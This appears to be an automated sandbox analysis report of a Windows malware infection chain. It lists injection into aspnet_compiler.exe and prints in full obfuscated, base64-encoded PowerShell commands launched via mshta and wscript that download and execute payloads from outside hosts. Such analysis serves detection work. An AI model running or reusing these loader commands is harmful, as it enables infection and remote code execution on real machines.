Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F4C5ED mov eax, dword ptr fs:[00000030h]	11_2_00F4C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F165D0 mov eax, dword ptr fs:[00000030h]	11_2_00F165D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F4A5D0 mov eax, dword ptr fs:[00000030h]	11_2_00F4A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F4A5D0 mov eax, dword ptr fs:[00000030h]	11_2_00F4A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F8D5D0 mov eax, dword ptr fs:[00000030h]	11_2_00F8D5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F8D5D0 mov ecx, dword ptr fs:[00000030h]	11_2_00F8D5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FE35D7 mov eax, dword ptr fs:[00000030h]	11_2_00FE35D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FE35D7 mov eax, dword ptr fs:[00000030h]	11_2_00FE35D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FE35D7 mov eax, dword ptr fs:[00000030h]	11_2_00FE35D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F395DA mov eax, dword ptr fs:[00000030h]	11_2_00F395DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F455C0 mov eax, dword ptr fs:[00000030h]	11_2_00F455C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FE55C9 mov eax, dword ptr fs:[00000030h]	11_2_00FE55C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F4E5CF mov eax, dword ptr fs:[00000030h]	11_2_00F4E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F4E5CF mov eax, dword ptr fs:[00000030h]	11_2_00F4E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FA35BA mov eax, dword ptr fs:[00000030h]	11_2_00FA35BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FA35BA mov eax, dword ptr fs:[00000030h]	11_2_00FA35BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FA35BA mov eax, dword ptr fs:[00000030h]	11_2_00FA35BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FA35BA mov eax, dword ptr fs:[00000030h]	11_2_00FA35BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FCF5BE mov eax, dword ptr fs:[00000030h]	11_2_00FCF5BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F345B1 mov eax, dword ptr fs:[00000030h]	11_2_00F345B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F345B1 mov eax, dword ptr fs:[00000030h]	11_2_00F345B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F3F5B0 mov eax, dword ptr fs:[00000030h]	11_2_00F3F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F3F5B0 mov eax, dword ptr fs:[00000030h]	11_2_00F3F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F3F5B0 mov eax, dword ptr fs:[00000030h]	11_2_00F3F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F3F5B0 mov eax, dword ptr fs:[00000030h]	11_2_00F3F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F3F5B0 mov eax, dword ptr fs:[00000030h]	11_2_00F3F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F3F5B0 mov eax, dword ptr fs:[00000030h]	11_2_00F3F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F3F5B0 mov eax, dword ptr fs:[00000030h]	11_2_00F3F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F3F5B0 mov eax, dword ptr fs:[00000030h]	11_2_00F3F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F3F5B0 mov eax, dword ptr fs:[00000030h]	11_2_00F3F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F315A9 mov eax, dword ptr fs:[00000030h]	11_2_00F315A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F315A9 mov eax, dword ptr fs:[00000030h]	11_2_00F315A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F315A9 mov eax, dword ptr fs:[00000030h]	11_2_00F315A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F315A9 mov eax, dword ptr fs:[00000030h]	11_2_00F315A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F315A9 mov eax, dword ptr fs:[00000030h]	11_2_00F315A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F905A7 mov eax, dword ptr fs:[00000030h]	11_2_00F905A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F905A7 mov eax, dword ptr fs:[00000030h]	11_2_00F905A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F905A7 mov eax, dword ptr fs:[00000030h]	11_2_00F905A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F4E59C mov eax, dword ptr fs:[00000030h]	11_2_00F4E59C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F9B594 mov eax, dword ptr fs:[00000030h]	11_2_00F9B594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F9B594 mov eax, dword ptr fs:[00000030h]	11_2_00F9B594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F12582 mov eax, dword ptr fs:[00000030h]	11_2_00F12582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F12582 mov ecx, dword ptr fs:[00000030h]	11_2_00F12582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F44588 mov eax, dword ptr fs:[00000030h]	11_2_00F44588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F0758F mov eax, dword ptr fs:[00000030h]	11_2_00F0758F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F0758F mov eax, dword ptr fs:[00000030h]	11_2_00F0758F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F0758F mov eax, dword ptr fs:[00000030h]	11_2_00F0758F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F4B570 mov eax, dword ptr fs:[00000030h]	11_2_00F4B570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F4B570 mov eax, dword ptr fs:[00000030h]	11_2_00F4B570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F0B562 mov eax, dword ptr fs:[00000030h]	11_2_00F0B562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F4656A mov eax, dword ptr fs:[00000030h]	11_2_00F4656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F4656A mov eax, dword ptr fs:[00000030h]	11_2_00F4656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F4656A mov eax, dword ptr fs:[00000030h]	11_2_00F4656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F18550 mov eax, dword ptr fs:[00000030h]	11_2_00F18550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F18550 mov eax, dword ptr fs:[00000030h]	11_2_00F18550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F4D530 mov eax, dword ptr fs:[00000030h]	11_2_00F4D530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F4D530 mov eax, dword ptr fs:[00000030h]	11_2_00F4D530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F1D534 mov eax, dword ptr fs:[00000030h]	11_2_00F1D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F1D534 mov eax, dword ptr fs:[00000030h]	11_2_00F1D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F1D534 mov eax, dword ptr fs:[00000030h]	11_2_00F1D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F1D534 mov eax, dword ptr fs:[00000030h]	11_2_00F1D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F1D534 mov eax, dword ptr fs:[00000030h]	11_2_00F1D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F1D534 mov eax, dword ptr fs:[00000030h]	11_2_00F1D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F20535 mov eax, dword ptr fs:[00000030h]	11_2_00F20535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F20535 mov eax, dword ptr fs:[00000030h]	11_2_00F20535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F20535 mov eax, dword ptr fs:[00000030h]	11_2_00F20535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F20535 mov eax, dword ptr fs:[00000030h]	11_2_00F20535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F20535 mov eax, dword ptr fs:[00000030h]	11_2_00F20535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F20535 mov eax, dword ptr fs:[00000030h]	11_2_00F20535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FE5537 mov eax, dword ptr fs:[00000030h]	11_2_00FE5537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F3E53E mov eax, dword ptr fs:[00000030h]	11_2_00F3E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F3E53E mov eax, dword ptr fs:[00000030h]	11_2_00F3E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F3E53E mov eax, dword ptr fs:[00000030h]	11_2_00F3E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F3E53E mov eax, dword ptr fs:[00000030h]	11_2_00F3E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F3E53E mov eax, dword ptr fs:[00000030h]	11_2_00F3E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FCB52F mov eax, dword ptr fs:[00000030h]	11_2_00FCB52F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FBF525 mov eax, dword ptr fs:[00000030h]	11_2_00FBF525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FBF525 mov eax, dword ptr fs:[00000030h]	11_2_00FBF525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FBF525 mov eax, dword ptr fs:[00000030h]	11_2_00FBF525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FBF525 mov eax, dword ptr fs:[00000030h]	11_2_00FBF525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FBF525 mov eax, dword ptr fs:[00000030h]	11_2_00FBF525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FBF525 mov eax, dword ptr fs:[00000030h]	11_2_00FBF525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FBF525 mov eax, dword ptr fs:[00000030h]	11_2_00FBF525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F47505 mov eax, dword ptr fs:[00000030h]	11_2_00F47505
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F47505 mov ecx, dword ptr fs:[00000030h]	11_2_00F47505
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FE4500 mov eax, dword ptr fs:[00000030h]	11_2_00FE4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FE4500 mov eax, dword ptr fs:[00000030h]	11_2_00FE4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FE4500 mov eax, dword ptr fs:[00000030h]	11_2_00FE4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FE4500 mov eax, dword ptr fs:[00000030h]	11_2_00FE4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FE4500 mov eax, dword ptr fs:[00000030h]	11_2_00FE4500

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell decode and execute

Source: Yara match

File source: amsi32_6084.amsi.csv, type: OTHER

Yara detected Powershell download and execute

Source: Yara match	File source: amsi32_6084.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6084, type: MEMORYSTR

Injects a PE file into a foreign processes

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 7C8008	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerShell -EX BypasS -NoP -w 1 -c DevICEcrEdenTiaLdeplOymENT.exe ; invoke-exPRessIoN($(invOke-EXprESsIoN('[sYSTeM.TEXt.eNCodiNG]'+[CHAr]0X3a+[ChaR]58+'utf8.GetStrIng([sysTeM.cONveRT]'+[CHAR]0X3A+[CHAR]0x3A+'FRombaSe64sTRinG('+[CHAr]0x22+'JFkydXEzSjNpbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJkZUZpbkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxtT24uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxam9VQkhYYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2JNZWFlcXosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJLdlZrWGZVckZuLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVkR5RXpmdnMsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVpYXFNRlpBVWlEKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJsU0siICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWTJ1cTNKM2lsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMjMzL2NyZWF0ZWRiZXN0dGhpbmdzd2l0aGVuZXJneWxldmVsZ29vZGZvcmJ1c2luZXNzcHVyb3BzZS50SUYiLCIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIiwwLDApO3N0QVJULXNsRWVQKDMpO0luVm9rRS1leFByRXNzaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIg=='+[chaR]0x22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwerShell -EX BypasS -NoP -w 1 -c DevICEcrEdenTiaLdeplOymENT.exe ; invoke-exPRessIoN($(invOke-EXprESsIoN('[sYSTeM.TEXt.eNCodiNG]'+[CHAr]0X3a+[ChaR]58+'utf8.GetStrIng([sysTeM.cONveRT]'+[CHAR]0X3A+[CHAR]0x3A+'FRombaSe64sTRinG('+[CHAr]0x22+'JFkydXEzSjNpbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJkZUZpbkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxtT24uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxam9VQkhYYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2JNZWFlcXosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJLdlZrWGZVckZuLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVkR5RXpmdnMsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVpYXFNRlpBVWlEKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJsU0siICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWTJ1cTNKM2lsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMjMzL2NyZWF0ZWRiZXN0dGhpbmdzd2l0aGVuZXJneWxldmVsZ29vZGZvcmJ1c2luZXNzcHVyb3BzZS50SUYiLCIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIiwwLDApO3N0QVJULXNsRWVQKDMpO0luVm9rRS1leFByRXNzaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIg=='+[chaR]0x22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zl2mzrqp\zl2mzrqp.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithenergylevelgoodforbusiness.vbS"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD327.tmp" "c:\Users\user\AppData\Local\Temp\zl2mzrqp\CSC28505E0AE9E8489AA3B119DACC3AAED2.TMP"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $cyclooctadiene = 'JGhpY2N1cHBpbmcgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskcHJpbXBpbmcgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtb3ZpbmdzID0gJHByaW1waW5nLkRvd25sb2FkRGF0YSgkaGljY3VwcGluZyk7JGFuc2VyZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkbW92aW5ncyk7JGZsdXR0ZXJieSA9ICc8PEJBU0U2NF9TVEFSVD4+JzskaGFta2luID0gJzw8QkFTRTY0X0VORD4+JzskdW5ncmlldmluZyA9ICRhbnNlcmVzLkluZGV4T2YoJGZsdXR0ZXJieSk7JGNvbnRyYXZlbmVyID0gJGFuc2VyZXMuSW5kZXhPZigkaGFta2luKTskdW5ncmlldmluZyAtZ2UgMCAtYW5kICRjb250cmF2ZW5lciAtZ3QgJHVuZ3JpZXZpbmc7JHVuZ3JpZXZpbmcgKz0gJGZsdXR0ZXJieS5MZW5ndGg7JHNub3dtb2JpbGUgPSAkY29udHJhdmVuZXIgLSAkdW5ncmlldmluZzskd2hvcnRsZSA9ICRhbnNlcmVzLlN1YnN0cmluZygkdW5ncmlldmluZywgJHNub3dtb2JpbGUpOyRyZXZlYWxlZCA9IC1qb2luICgkd2hvcnRsZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkd2hvcnRsZS5MZW5ndGgpXTskbWFza2luZyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHJldmVhbGVkKTskdHJhbnNvY2VhbmljID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkbWFza2luZyk7JFRoYXRjaGVyaXNlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JFRoYXRjaGVyaXNlLkludm9rZSgkbnVsbCwgQCgnMC8xTDJ0ZS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJHRob21zb25pYW5pc20nLCAnJHRob21zb25pYW5pc20nLCAnJHRob21zb25pYW5pc20nLCAnYXNwbmV0X2NvbXBpbGVyJywgJyR0aG9tc29uaWFuaXNtJywgJyR0aG9tc29uaWFuaXNtJywnJHRob21zb25pYW5pc20nLCckdGhvbXNvbmlhbmlzbScsJyR0aG9tc29uaWFuaXNtJywnJHRob21zb25pYW5pc20nLCckdGhvbXNvbmlhbmlzbScsJzEnLCckdGhvbXNvbmlhbmlzbScsJycpKTs=';$italicizing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($cyclooctadiene));Invoke-Expression $italicizing	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]0x22+'jfkydxezsjnpbcagicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagigfezc1uevblicagicagicagicagicagicagicagicagicagicagicagic1nru1izxjkzuzpbkl0au9uicagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvumxtt24uzgxsiiwgicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagicbxam9vqkhyyixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicaga2jnzwflcxosc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagiejldlzrwgzvckzulhvpbnqgicagicagicagicagicagicagicagicagicagicagicagvkr5rxpmdnmssw50uhryicagicagicagicagicagicagicagicagicagicagicagifvpyxfnrlpbvwlektsnicagicagicagicagicagicagicagicagicagicagicagic1uyw1ficagicagicagicagicagicagicagicagicagicagicagicjsu0siicagicagicagicagicagicagicagicagicagicagicagic1oqu1lu3bhy2ugicagicagicagicagicagicagicagicagicagicagicagthggicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicakwtj1ctnkm2lsojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtcylji0ns4xmjmumtivmjmzl2nyzwf0zwrizxn0dghpbmdzd2l0agvuzxjnewxldmvsz29vzgzvcmj1c2luzxnzchvyb3bzzs50suyilcikru52okfquerbvefcy3jlyxr